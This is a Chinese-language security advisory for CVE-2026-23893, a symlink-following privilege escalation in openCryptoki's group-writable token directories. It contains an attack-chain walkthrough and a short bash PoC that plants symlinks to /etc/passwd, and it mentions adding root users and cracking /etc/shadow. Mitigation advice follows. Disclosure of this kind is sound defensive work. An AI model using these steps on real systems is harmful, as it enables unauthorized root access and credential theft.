CVE-2026-23893 openCryptoki符号链接跟随权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-23893

漏洞类型

符号链接跟随/权限提升

CVSS评分

6.8 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

openCryptoki

漏洞概述

openCryptoki是一个PKCS#11库，为Linux和AIX系统提供加密令牌管理功能。该漏洞影响版本2.3.2及以上，主要源于令牌目录权限配置不当（0770，允许组内用户写入）。在特权上下文中运行时，攻击者可以通过在组可写目录中植入符号链接，诱使以root身份运行的应用程序将文件所有权或权限重置到任意目标，从而实现权限提升或敏感数据泄露。攻击利用门槛较低，需要攻击者具有令牌组用户身份，并通过正常维护操作触发漏洞利用。

技术细节

漏洞根本原因在于openCryptoki的令牌目录和锁目录设置为0770权限，允许令牌组内所有用户在这些目录中创建文件和符号链接。当管理员或特权进程（如pkcs11_eventmgr）执行维护操作时，会对令牌目录内的文件执行chown操作。攻击者利用此机制：1) 在组可写目录中创建符号链接，指向系统敏感文件（如/etc/passwd或/etc/shadow）；2) 等待管理员运行PKCS#11应用程序或管理工具触发文件操作；3) 系统以root权限跟随符号链接，将目标文件所有权修改为root:token-group；4) 攻击者作为令牌组成员获得对目标文件的写权限。CVSS向量显示攻击复杂度低且需要用户交互，但影响严重（机密性和完整性均为高），攻击复杂度为本地级别。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的令牌组用户身份，确认具有对openCryptoki令牌目录的写入权限

STEP 2

步骤2

在组可写令牌目录（如/var/lib/opencryptoki/token/）中创建符号链接，指向系统敏感文件（如/etc/passwd、/etc/shadow或SSH私钥）

STEP 3

步骤3

等待系统管理员运行PKCS#11应用程序、执行pkcsconf管理工具或pkcs11_eventmgr守护进程进行常规维护

STEP 4

步骤4

openCryptoki代码以root权限跟随符号链接，对目标文件执行chown操作，将文件所有权改为root:token-group

STEP 5

步骤5

攻击者作为令牌组成员获得对目标文件的写权限，可修改/etc/passwd添加root用户、覆盖SSH authorized_keys或读取shadow文件进行离线破解

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-23893 PoC - Symlink Following Privilege Escalation
# Requires: token-group membership

TARGET_FILE="/etc/passwd"
TOKEN_DIR="/var/lib/opencryptoki/token/"
ATTACKER_USER="attacker"

# Step 1: Find writable token directory
echo "[*] Identifying writable token directory..."
for dir in $(find $TOKEN_DIR -type d -perm -g=w 2>/dev/null); do
    echo "[+] Found writable directory: $dir"
    
    # Step 2: Create symlink to target file
    SYMLINK="$dir/root_ownership_$(date +%s)"
    ln -sf $TARGET_FILE $SYMLINK
    echo "[+] Created symlink: $SYMLINK -> $TARGET_FILE"
    
    # Step 3: Wait for admin maintenance (pkcs11_eventmgr or pkcsconf)
    echo "[*] Waiting for admin PKCS#11 operation..."
    echo "[*] Trigger: Run 'pkcsconf -t' or pkcs11_eventmgr as root"
    
    # Step 4: Verify ownership change
    if [ -L "$SYMLINK" ]; then
        OWNER=$(stat -c '%U:%G' $TARGET_FILE 2>/dev/null)
        echo "[+] Target file ownership: $OWNER"
        if echo "$OWNER" | grep -q "root.*"; then
            echo "[!] Exploit successful - verify write access"
        fi
    fi
done

影响范围

openCryptoki 2.3.2 <= version < 5e6e4b4 (unreleased)

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时措施：1) 严格限制令牌目录的组权限，确保只有必要的服务账户属于token-group；2) 监控令牌目录内的文件创建行为，及时发现异常符号链接；3) 避免在生产环境中以root权限运行PKCS#11应用程序；4) 考虑使用seccomp或容器隔离限制文件操作能力；5) 定期审计token-group成员列表，移除非必要用户。